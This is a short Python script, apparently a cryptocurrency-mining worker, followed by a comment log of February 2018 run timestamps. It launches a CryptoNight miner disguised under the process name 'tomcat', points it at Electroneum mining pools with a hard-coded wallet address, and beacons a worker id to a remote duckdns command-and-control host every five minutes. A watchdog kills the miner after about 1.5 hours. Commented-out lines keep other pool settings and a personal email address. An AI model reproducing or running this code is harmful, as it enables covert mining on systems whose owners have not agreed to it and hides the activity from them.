import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:30:01.403443
#2018-02-17 17:18:06.155861
#2018-02-17 19:06:04.278440
#2018-02-17 20:56:06.381709
#2018-02-17 22:42:07.402862
#2018-02-18 00:26:01.848730
#2018-02-18 02:17:01.514776
#2018-02-18 04:05:06.532289
#2018-02-18 05:56:03.761876
#2018-02-18 07:46:01.492016
#2018-02-18 09:34:04.925853
#2018-02-18 11:20:08.026963
#2018-02-18 13:06:06.044682
#2018-02-18 14:54:07.499520
#2018-02-18 16:43:03.511070
#2018-02-18 18:32:03.753146
#2018-02-18 20:20:10.124670
#2018-02-18 22:06:04.437009
#2018-02-18 23:54:02.192628
#2018-02-19 01:40:01.344992
#2018-02-19 03:28:03.935732
#2018-02-19 05:12:07.262678
#2018-02-19 06:57:06.085786
#2018-02-19 08:46:06.722646
#2018-02-19 10:37:08.010380
#2018-02-19 12:23:06.525185
#2018-02-19 14:11:04.785450
#2018-02-19 16:01:06.611426
#2018-02-19 17:50:03.093699
#2018-02-19 19:36:07.794256
#2018-02-19 21:23:06.198198
#2018-02-19 23:09:07.960187
#2018-02-20 00:54:05.690644
#2018-02-20 02:44:01.768996
#2018-02-20 04:34:01.790951
#2018-02-20 06:18:01.490805
#2018-02-20 08:03:02.198591
#2018-02-20 09:48:05.031818
#2018-02-20 11:32:06.140110
#2018-02-20 13:20:01.743011
#2018-02-20 15:03:08.169427
#2018-02-20 16:48:05.295551
#2018-02-20 18:32:09.462899
#2018-02-20 20:24:06.520321
#2018-02-20 22:09:06.140718
#2018-02-20 23:49:06.446831
#2018-02-21 01:33:08.374915
#2018-02-21 03:21:05.475679
#2018-02-21 05:08:01.460426
#2018-02-21 06:55:08.216455
#2018-02-21 08:41:01.323228
#2018-02-21 10:27:01.478724
#2018-02-21 12:14:07.624064
#2018-02-21 14:03:06.951791
#2018-02-21 15:47:04.249394
#2018-02-21 17:39:08.534004
#2018-02-21 19:25:04.519477
#2018-02-21 21:15:01.604639
#2018-02-21 23:02:06.845392
#2018-02-22 00:51:02.136587
#2018-02-22 02:38:06.998508
#2018-02-22 04:23:07.919718
#2018-02-22 06:10:04.086500
#2018-02-22 07:56:01.330241
#2018-02-22 09:44:08.735492
#2018-02-22 11:30:12.428926
#2018-02-22 13:18:04.665695
#2018-02-22 15:06:01.444522
#2018-02-22 16:49:01.915470
#2018-02-22 18:37:06.202668
#2018-02-22 20:28:01.807050
#2018-02-22 22:15:01.611388
#2018-02-23 00:01:01.765170
#2018-02-23 01:50:01.450332
#2018-02-23 03:37:05.625255
#2018-02-23 05:22:03.766624
#2018-02-23 07:07:06.838946
#2018-02-23 08:56:07.207800
#2018-02-23 11:14:04.575041
#2018-02-23 13:07:04.595054
#2018-02-23 14:52:01.559168
#2018-02-23 16:41:09.092939
#2018-02-23 18:29:05.407287
#2018-02-23 20:15:05.405059
#2018-02-23 22:04:02.040262
#2018-02-23 23:53:02.062517
#2018-02-24 01:44:06.532090
#2018-02-24 03:40:08.039797
#2018-02-24 05:24:03.981416
#2018-02-24 07:12:06.661235
#2018-02-24 09:03:04.475168
#2018-02-24 10:59:03.546406
#2018-02-24 12:48:01.283847
#2018-02-24 14:37:04.565283
#2018-02-24 16:24:01.406377
#2018-02-24 18:17:01.437105
#2018-02-24 20:03:06.319945
#2018-02-24 21:45:08.268258
#2018-02-25 00:43:02.088658
#2018-02-25 04:48:01.509055
#2018-02-25 09:09:01.832441